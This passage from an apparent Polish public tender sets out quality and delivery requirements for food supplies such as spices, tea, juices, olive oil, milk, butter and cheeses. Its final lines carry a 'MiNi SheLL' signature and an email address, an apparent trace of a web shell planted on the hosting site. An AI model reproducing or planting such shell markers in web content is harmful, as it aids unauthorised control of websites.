Charakterystyczny dla rodzaju, przyjemny, bez obcych zapachów

Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz  bakterii chorobotwórczych

Przyprawy 

opakowanie
Torebki papierowe z folią wielowarstwową, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników, całe, szczelne

Cechy sensoryczne
Wygląd
Charakterystyczny dla rodzaju i stopnia rozdrobnienia,  barwa charakterystyczna dla rodzaju surowca

tekstura i konsystencja  
Sypka, bez grudek, nie zlepiająca się przy ucisku, bez zbryleń, delikatna

Smak
Charakterystyczny dla rodzaju surowca, bez obcych posmaków

zapach
Charakterystyczny dla rodzaju surowca, przyjemny, bez obcych zapachów
Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz  bakterii chorobotwórczych

Sól , cukier i wyroby cukiernicze ( herbatniki, biszkopty), paluszki, cukier waniliowy,

opakowanie
Worki papierowe wielowarstwowe, torebki foliowe, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników, całe, szczelne

Cechy sensoryczne
Wygląd
Cukier i sól  barwa biała, pozostałe wygląd typowy dla produktu

tekstura i konsystencja  
Kryształy sypkie, bez zlepów i grudek, pozostałe konsystencja chrupiąca, sól sypkie kryształy o różnym kształcie

Smak
Słodki, przyjemny, sól słony, paluszki neutralny, bez obcych posmaków, zjełczenia

zapach
Lekko słodkawy, charakterystyczny  dla dodanego aromatu, bez obcych posmaków, sól b/zapachu
Właściwości fizykochemiczne i biologiczne
Suche, brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz  bakterii chorobotwórczych

Używki: herbaty, kakao

opakowanie
Zewnętrzne opakowanie kartonowe, torebki foliowe, wielowarstwowe, odpowiednio oznakowane, czyste, bez oznak zawilgocenia, zapleśnienia, obecności szkodników, całe, szczelne

Cechy sensoryczne
Wygląd
Ciemno brązowe, czerwone lub zielone zabarwienie, jednolite, wygląd naparu: żywy, jasnobrązowy, 

tekstura i konsystencja  
Sypkie, suche, w zalezności od stopnia rozdrobnienia liści czy dodatku owoców, bez grudek, zlepień, 

Smak
Naparu właściwy, charakterystyczny dla danego gatunku lub dodatków, bez obcych posmaków, łagodny

zapach
Właściwy, charakterystyczny dla danego gatunku i dodatków, bez obcych zapachów, 
Właściwości fizykochemiczne i biologiczne
Suche, brak zanieczyszczeń fizycznych, oznak i pozostałości szkodników, brak zanieczyszczeń biologicznych, pleśni oraz  bakterii chorobotwórczych

Majonez , musztarda, 

opakowanie
Szklane, bez wyszczerbień, nie uszkodzone, szczelne, właściwie oznakowane, czyste

Cechy sensoryczne
Wygląd
Majonez barwa jasokremowa, jednolita, musztarda brązowa, niejednolita, z drobinami przypraw


tekstura i konsystencja  
 Jednorodna,  kremowa, bez rozwarstwień, 


Smak
Charakterystyczny, lekko kwaśny,  bez posmaków obcych, 


zapach
Charakterystyczny lekko ostry, bez zapachów obcych, 

Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń chemicznych, brak oznak zapleśnienia, psucia, sfermentowania,  brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych,

Drożdże

opakowanie
Pergamin, czyste, bez uszkodzeń, właściwie oznakowane

Cechy sensoryczne
Wygląd
Brązowo - szary, barwa jednolita, powierzchnia błyszcząca, 


tekstura i konsystencja  
Jednolita, po rozłamaniu błyszcząca


Smak
Delikatny, drożdżowy, bez obcych posmaków


zapach
Drożdżowy, bez obcych posmaków, 

Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń chemicznych, brak oznak zapleśnienia, psucia, sfermentowania,  brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych, właściwa aktywność fermetacyjna, zawartość białka mi. 42 %





Soki
Opakowanie, opakowanie transportowe
Butelki szklane, PET lub kartony wielowarstwowe, czyste, nieuszkodzone, szczelnie zamknięte, bez oznak otwarcia lub bombażu prawidłowo oznakowane, opakowanie zbiorcze: zgrzewka foliowa, 
Właściwości fizykochemiczne i biologiczne
Bez zanieczyszczeń obcych, brak zanieczyszczeń chemicznych, brak oznak i obecności pleśni, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych, brak szkodników magazynowych i ich śladów
Wygląd, barwa
Charakterystyczna dla danego rodzaju owoców lub warzyw, 
Smak i zapach
charakterystyczny dla danego rodzaju owoców lub warzyw, bez obcych posmaków, i zapachów, niedopuszczalny zapach stęchły, 
konsystencja
Jednolita, lub z kawałkami owoców czy miąższu, niedopuszczalna kleista, śluzowatość
klarowność
Woda klarowna, czysta bez zanieczyszczeń fizycznych i osadów, soki mętne lun klarowne w zależności od obecności cząstek miąższu 
Grupa asortymentowa: tłuszcze jadalne: oliwa, 
opakowanie
 Oliwa: butelki szklane
Czyste, nie uszkodzone, szczelnie zamknięte, prawidłowo oznakowane
Cechy sensoryczne
Wygląd

Oliwa: barwa jasnozielonkawa, 

tekstura i konsystencja  
oliwa: dopuszczalne zmętnienie w przypadku przechowywania poniżej 4 oC

Smak
oliwa: obojętny lub delikatnie swoisty dla surowca, zapach typowy dla surowca, 

zapach
Obojętny lub delikatny typowy dla surowca, 
Właściwości fizykochemiczne i biologiczne
Brak zanieczyszczeń chemicznych lub biologicznych, brak obecności pleśni, brak zanieczyszczeń mikrobiologicznych i bakterii chorobotwórczych

III. Wymagania przy każdej dostawie:
do każdej dostawy odpowiednią dokumentację
warunki transportowe muszą być zgodne z zasadami GMP/GHP, do wglądu książka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, powinien posiadać na sobie czysty fartuch,
realizacja zamówienia 7.00 - 11.00  w następnym dniu roboczym po dniu złożenia zamówienia, bezpośrednio do magazynu żywnościowego do osoby upoważnionej do odbioru - magazyniera
artykuły spożywcze muszą być dostarczane w opakowaniach jednostkowych opisanych w formularzu cenowym lub w opakowaniach o gramaturze bardzo zbliżonej, nie mniejszej niż opisana przez Zamawiającego, nie dopuszcza się dostaw luzem w opakowaniach np. 20kg, 50kg, artykuły muszą być dostarczone w oryginalnych opakowaniach zbiorczych oraz jednostkowych producenta z pełnym oznakowaniem w języku polskim
artykuły spożywcze muszą posiadać maksymalny okres przydatności do spożycia przewidziany dla danego artykułu
w przypadku reklamacji żywności, musi być ona zabrana lub wymieniona przez dostawcę w tym samym dniu roboczym do godz. 14.00..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> mleko, jego przetwory i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
asortyment
pojemność
ilość
1.
mleko spożywcze pasteryzowane 2 % tłuszczu
5 l
625000 l
2.
mleko spożywcze pasteryzowane 2 % tłuszczu
1 l
12500 l
3.
śmietana 12 % tłuszczu, lekko ukwaszona
400g
8900 szt
4.
jogurt naturalny, typu Zott
150g
3800 szt
5.
jogurt owocowy
150g
7500 szt
6.
kefir 1,5 % 
400 g
1900 szt
7.
maślanka naturalna
1l
190 szt
8.
masło ekstra
200g
13800 szt
9.
sery podpuszczkowe dojrzewające twarde i półtwarde
2 - 3 kg
250 kg
10.
ser twarogowy półtłusty
0,7 - 1 kg
3800 kg
11.
ser topiony naturalny w opak 8 x 25g, opak. 200g
200 g
1000 opak
12.
masło roślinne, typu Mlekovita
250g
1100 szt
13.
serek Capresi, z papryką, z ziołami, typu Warmia
150 g
150 szt
14.
Ser Feta 30 % tłuszczu, typu Mlekovita
270 g
100 szt
15.
Ser mozzarella light typu Zott
125 g 
80 szt
16
Ser mozarella mini kulki typu Mlekovita
150 g
80 szt
17.
Ser pleśniowy Camembert, typu   Turek
120 g
150 szt

Wymagania ogólne 
1. Jakość przyjmowanego surowca musi odpowiadać normom handlowym oraz wymaganiom specyfikacji wewnętrznej zamawiającego, czyli właściwości środków spożywczych określonych jako pożądane - stan idealny do małych odchyleń.
2. Jakość organoleptyczną żywności, której nie można ocenić przy przyjęciu towaru, sprawdzana jest przy produkcji. W przypadku nie spełnienia wymagań surowiec zostaje zwrócony do dostawcy a fakt odnotowany w formularzu reklamacyjnym
3. Znakowanie artykułów spożywczych w języku polskim, musi zapewnić ich pełną identyfikowalność.
W przypadku nieodpowiedniego oznakowania oraz środków spożywczych po dacie minimalnej trwałości lub przekroczonym terminie przydatności do spożycia nastąpi odmowa przyjęcia, odnotowana w formularzu reklamacyjnym.
4. Materiał opakowaniowy i transportowy  dopuszczony do kontaktu z żywnością
5. Dostawca musi funkcjonować zgodnie z aktualnymi wymaganiami prawa żywnościowego, sposób dostawy oraz dostarczana żywność musi być zgodna z wszystkimi wymaganiami prawa żywnościowego.

Wymagania szczegółowe poszczególnych grup asortymentowych - wymagane właściwości żywności ( specyfikacja wewnętrzna)

1. mleko spożywcze pasteryzowane 2% tłuszczu                                            
Wymagania jakościowe:
opakowanie: worek z folii PE 5 l  i 1 l, czysty, nieuszkodzony, z wyraźnym, trwałym oznakowaniem wymaganym przez prawo żywnościowe
smak i zapach czysty,  mlekowy, z lekkim posmakiem pasteryzacji
barwa jasna, białą 
kwasowość 6,0 - 7,8 o SH
zawartość tłuszczu 2 %
niedopuszczalne zawartość aflatoksyn, i środków hamujących oraz bakterii chorobotwórczych.

2. śmietana 12 % tłuszczu, lekko ukwaszona                                          
Wymagania jakościowe:
opakowanie: kubek z tworzywa sztucznego zamykane termozgrzewalną zakrywką z folii aluminiowej, poj. 400g, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia, 
ukwaszona czystymi kulturami bakterii fermentacji mlekowej
kwasowość 15 - 32 o SH
płyn jednorodny, bez kłaczków ściętego sernika, bez podstoju serwatki
barwa jednolita, jasnokremowa lub kremowa, 
smak i zapach czysty, lekko kwaśny, bez obcych smaków i zapachów
zawartość tłuszczu 12 %
niedopuszczalna zawartość bakterii chorobotwórczych

3. fermentowane napoje mleczne
Jogurt naturalny i smakowy                                                                                
Wymagania jakościowe:
opakowanie: kubek z tworzywa sztucznego zamykane termozgrzewalną zakrywką z folii aluminiowej, poj. 150 g, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia, 
ukwaszony czystymi kulturami bakterii fermentacji mlekowej
kwasowość 3,9-4,6 pH
skrzep jednolity, widoczne kawałki owoców
barwa biała do lekko kremowej, zabarwienie charakterystyczne dla owoców
smak i zapach czysty, lekko kwaśny, orzeźwiający, bez obcych smaków i zapachów, posmak i zapach owoców
zawartość tłuszczu 1,5 - 2 %
niedopuszczalna zawartość bakterii chorobotwórczych
zawartość tłuszczu 1,5 - 2 %
niedopuszczalna zawartość bakterii chorobotwórczych
Kefir 1,5  % tłuszczu                                                                                 
Wymagania jakościowe:
opakowanie: kubek z tworzywa sztucznego zamykane termozgrzewalną zakrywką z folii aluminiowej, poj. 400g, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia, 
kwasowość 36-45 o SH
skrzep płynny, jednolity z pęcherzykami dwutlenku węgla,
konsystencja jednolita, zawiesista
barwa biała do lekko kremowej, 
smak i zapach lekko kwaśny, lekko drożdżowy, orzeźwiający, bez obcych smaków i zapachów
zawartość tłuszczu 1,5  % do 2 %
niedopuszczalna zawartość bakterii chorobotwórczych


Maślanka naturalna                                                                                  
      Wymagania jakościowe:
opakowanie: kubek z tworzywa sztucznego zamykane termozgrzewalną zakrywką z folii aluminiowej lub karton wielowarstwowy, poj. 500 ml, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia, 
ukwaszona bakterii fermentacji mlekowej 
skrzep płynny, jednolity 
barwa biała do lekko kremowej, 
smak i zapach łagodny, orzeźwiający, śmietankowo - orzechowy,  bez obcych smaków i zapachów
zawartość tłuszczu około 1,5 - 2 %
niedopuszczalna zawartość bakterii chorobotwórczych

4. masło ekstra                                                                                                 
Wymagania jakościowe:
opakowanie: opakowanie foliowe, masa 200g, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia i nr partii
barwa jednolita, nieznacznie intensywniejsza na powierzchni, wygniecenie prawidłowe, powierzchnia gładka, sucha
konsystencja jednolita, zwarta, smarowna, 
smak i zapach czysty, lekko kwaśny, mlekowy, z lekkim posmakiem pasteryzacji, lekko tłuszczowy, 
zawartość wody nie więcej niż 16 %
zawartość tłuszczu nie mniej niż 82 %
zawartość soli nie więcej niż 2,0 %
kwasowość tłuszczowa nie więcej niż 2 o SH
niedopuszczalne zawartość aflatoksyn, i środków hamujących oraz bakterii chorobotwórczych

5. sery podpuszczkowe dojrzewające twarde i półtwarde                              
Wymagania jakościowe:
opakowanie: powłoka z tworzywa sztucznego lub parafina, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia,
typu holenderskiego twarde lub półtwarde, typu edamski, gouda, podlaski, puławski, zamojski itp.
miąższ miękki, elastyczny, jednolity w całej masie, zwarty, z rzadko rozmieszczonymi oczkami wielkości grochu
smak i zapach łagodny, czysty, lekko orzechowym i lekko kwaskowy w serach młodych, 
kształt regularny, płaskich cylindrów lub bloków o wadze 2 - 3 kg
skórka serów niezbyt gruba, gładka, mocna, sucha, czysta bez uszkodzeń mechanicznych i wżerów
barwa naturalna, jednolita w całej masie
zawartość wody w masie beztłuszczowej 54 - 63 półtwarde, 49-56 % twarde
zawartość tłuszczu w suchej masie 45 - 60 %

6. ser twarogowy półtłusty                                                                             
Wymagania jakościowe:
opakowanie: papier pergaminowy, masa około 0,7 - 1 kg, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia,
zawartość tłuszczu 15 +- 2 % tłuszczu w suchej masie, do 82 % wody
smak i zapach czysty, łagodny, lekko kwaśny, 
struktura jednolita, zwarta, bez grudek lub lekko ziarnista
barwa biała do kremowej, jednolita w całej masie 
kwasowość 80 - 110 o SH
niedopuszczalna zawartość bakterii chorobotwórczych

7.ser topiony naturalny waga  25g                                                                 
Wymagania jakościowe:
opakowanie: folia aluminiowa lub opakowanie z tworzywa z zakrywką z folii aluminiowej, masa 25g, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia,
smak i zapach łagodny, 
konsystencja zwięzła lub smarowna, jednolita, bez ziarnistości, 
kremowe  około 60 % tłuszczu w suchej masie i do 55 % wody, tłuste około 40 % tłuszczu w suchej masie i do 55 % wody
barwa jednolita 
niedopuszczalna zawartość bakterii chorobotwórczych

8. masło roślinne typu Mlekovita
Wymagania jakościowe:
opakowanie: folia aluminiowa , masa 250g, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia,
smak i zapach łagodny, bez obcych posmaków, niedopuszczalny smak obcy, zjełczały, kwaśny lub gorzki, pleśniowy, stęchły
konsystencja smarowna, jednolita, bez ziarnistości, zbliżona do masła, bez rozwarstwień z wydzielaniem kropli wody
 około 80 % olejów ciekłych, 
barwa jednolita, jasnokremowa do kremowej,  niedopuszczalna intensywnie żółta lub szara, przebarwienia, plamy, cętki, smugi
niedopuszczalna zawartość bakterii chorobotwórczych

9. ser solankowy Feta, mozarella                               
Wymagania jakościowe:
opakowanie: karton wielowarstwowy, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia,
zawartość tłuszczu do 30 %
miąższ zwięzły, miękki lub lekko kruchy
barwa jednolita, biała do kremowej
smak i zapach czysty, delikatny, słony
niedopuszczalna obecność bakterii chorobotwórczych

10. ser z porostem pleśniowym typu camembert                              
Wymagania jakościowe:
opakowanie: folia aluminiowa, czyste, nieuszkodzone, z wyraźnie,  trwale oznakowaną datą przydatności do spożycia,
pełnotłusty, min. 50 % tłuszczu
miąższ miękki, kremowy, bez oczek, jednolity w całej masie, twardszy ku środkowi
powierzchnia równomiernie pokryta białą pleśnią
smak i zapach łagodny, lekko pieczarkowy
niedopuszczalne przebarwienia, plamy
niedopuszczalna zawartość bakterii chorobotwórczych

Wymagania jaki musi spełnić dostawca i dokumenty, jakie należy dołączyć do oferty:
w przypadku producenta świadectwo nadzoru weterynaryjnego zakładu,  z którego pochodzą produkty lub w przypadku hurtowni świadectwo nadzoru PIS
oświadczenie o stopniu wdrożenia zasad GMP lub GHP oraz systemu HACCP lub Systemu Zarządzania Bezpieczeństwem Żywności; jeżeli zakład posiada certyfikowany system - kopię certyfikatu
dokument dopuszczający do transportu żywności samochody transportowe wykonawcy, 
zgoda na przeprowadzenie przez zamawiającego auditu  funkcjonującego u dostawcy Systemu Bezpieczeństwa Żywności 

Wymagania przy każdej dostawie:
do każdej dostawy, na każdą partię określonego surowca (Handlowy dokument identyfikacyjny), zgodnie z Rozporządzeniem WE  853,2004 Parlamentu Europejskiego i Rady z dnia 29.04.2004 ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego ( Dz. Urz. UE L 139 z 30.04.2004), w rozumieniu art. 3 ust. 3 Rozporządzenia WE nr 178;2002 Parlamentu Europejskiego i Rady z dnia 28.01.2002
etykieta w języku polskim zawierającą minimum: opis asortymentu, temperaturę przechowywania, datę przydatności do spożycia
temperatura surowców (mierzona w produkcie)w momencie odbioru dostawy musi mieścić się w zakresie od 2 do 6° C, 
warunki transportowe muszą być zgodne z zasadami GMP lub GHP, do wglądu książka mycia i dezynfekcji pojazdu oraz książeczka zdrowia kierowcy, powinien posiadać na sobie czysty fartuch, 
dostawy: mleko  w godz. 5.00 - 5.30 bezpośrednio do kuchni do uprawnionego do odbioru pracownika, pozostały asortyment: 7.30 - 9.00 bezpośrednio do magazynu żywnościowego do osoby upoważnionej - magazyniera
realizacja zamówienia w czasie do 19 h od złożenia zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com